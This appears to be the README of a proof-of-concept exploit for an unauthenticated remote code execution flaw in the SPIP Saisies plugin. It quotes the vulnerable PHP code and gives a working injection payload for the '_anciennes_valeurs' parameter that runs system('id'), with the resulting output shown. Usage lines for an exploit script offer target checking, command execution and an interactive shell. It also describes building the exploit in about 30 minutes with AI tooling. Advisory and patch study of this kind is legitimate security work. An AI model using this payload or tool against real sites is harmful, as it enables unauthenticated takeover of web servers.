# CVE-2025-71243 - SPIP Saisies Plugin Remote Code Execution

**Full AI-assisted vulnerability reversal** - Zero prior research. Saw the advisory on VulnCheck, reversed the vulnerability entirely using AI tooling.

## Overview

| Field | Value |
|---|---|
| **CVE** | CVE-2025-71243 |
| **Severity** | Critical (CVSS 9.3) |
| **CWE** | CWE-94 - Improper Control of Generation of Code ('Code Injection') |
| **Affected** | SPIP Saisies plugin 5.4.0 through 5.11.0 |
| **Fixed in** | 5.11.1 |
| **Credit** | OpenStudio (discovery), Valentin Lobstein (PoC) |

## Vulnerability

The `saisies_formulaire_charger_generer_hidden_ancienne_valeur_depubliee()` function in `saisies_pipelines.php` trusts the `_anciennes_valeurs` form parameter from user input during the form load phase. The raw value is interpolated directly into an HTML hidden field with single-quoted attributes and no escaping.

The critical detail: SPIP's `#ACTION_FORMULAIRE` balise sets `interdire_scripts = false` on the `_hidden` field, meaning the injected content bypasses SPIP's script filtering entirely. Since the hidden field output is part of a PHP template executed via `eval()`, injected `<?php ?>` tags are executed directly by the PHP interpreter.

This results in **unauthenticated Remote Code Execution** on any page containing a saisies-powered form.

This vulnerability follows the same pattern as [CVE-2023-27372](https://github.com/nuts7/CVE-2023-27372) - unauthenticated RCE through unsanitized form parameter injection into SPIP's template engine. Where CVE-2023-27372 exploited the `oubli` parameter on the password reset form, this one targets `_anciennes_valeurs` on any saisies-powered form.

### Prerequisites

The vulnerability requires a **publicly accessible form powered by saisies**. The saisies plugin is rarely used standalone - it is almost always installed as a dependency of [Formidable](https://plugins.spip.net/formidable), the most popular SPIP form builder. Any site using Formidable to create public-facing forms (contact, registration, surveys) exposes the vulnerable code path.

### Vulnerable Code

```php
// saisies_pipelines.php line 215-227
function saisies_formulaire_charger_generer_hidden_ancienne_valeur_depubliee($flux) {
    if ($anciennes_valeurs = saisies_request('_anciennes_valeurs')) {
        $encode = $anciennes_valeurs;   // User input trusted directly
    }
    // ...
    return "<input type='hidden' name='_anciennes_valeurs' value='$encode' />";
    //      Single-quoted attribute, $encode has NO escaping  ^^^^^^^^^
}
```

This output is appended to `$flux['data']['_hidden']` (line 201), which SPIP renders via:

```php
// ecrire/public/balises.php line 2558-2577
$p->code = "... (\$Pile[0]['_hidden'] ?? '') ...";
$p->interdire_scripts = false;  // No script filtering!
```

### Exploitation

1. Send `_anciennes_valeurs` containing a single quote to break out of `value=''`
2. Inject a `<?php ?>` tag with arbitrary PHP code
3. The PHP interpreter executes it during template rendering

```
POST /spip.php?page=contact
_anciennes_valeurs=x' /><?php system('id'); ?><input value='x
```

Rendered output:
```html
<input type='hidden' name='_anciennes_valeurs' value='x' />
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<input value='x' />
```

### The Fix

The fix (commit `1b1b578`) removes the `if` branch entirely - the value is always recomputed server-side via `encoder_contexte_ajax()`.

## Usage

```bash
# Check if target is vulnerable
python3 exploit.py -u http://target/spip.php?page=contact --check

# Execute a single command
python3 exploit.py -u http://target/spip.php?page=contact -c "id"

# Interactive shell
python3 exploit.py -u http://target/spip.php?page=contact
```

## Requirements

```bash
pip install requests
```

## Timeline

- **2024-02-12** - Vulnerable code introduced in commit `4f84141` (v5.4.0)
- **2026-02-19** - Advisory published on VulnCheck
- **2026-02-19** - PoC developed in ~30 minutes (full AI-assisted reversal, same day)

## References

- [VulnCheck Advisory](https://www.vulncheck.com/advisories/spip-saisies-plugin-remote-code-execution)
- [SPIP Security Blog Post](https://blog.spip.net/Mise-a-jour-critique-de-securite-pour-le-plugin-Saisies.html)
- [Plugin Page](https://plugins.spip.net/saisies)

## Disclaimer

This tool is provided for educational purposes and authorized security testing only. The author is not responsible for any misuse.
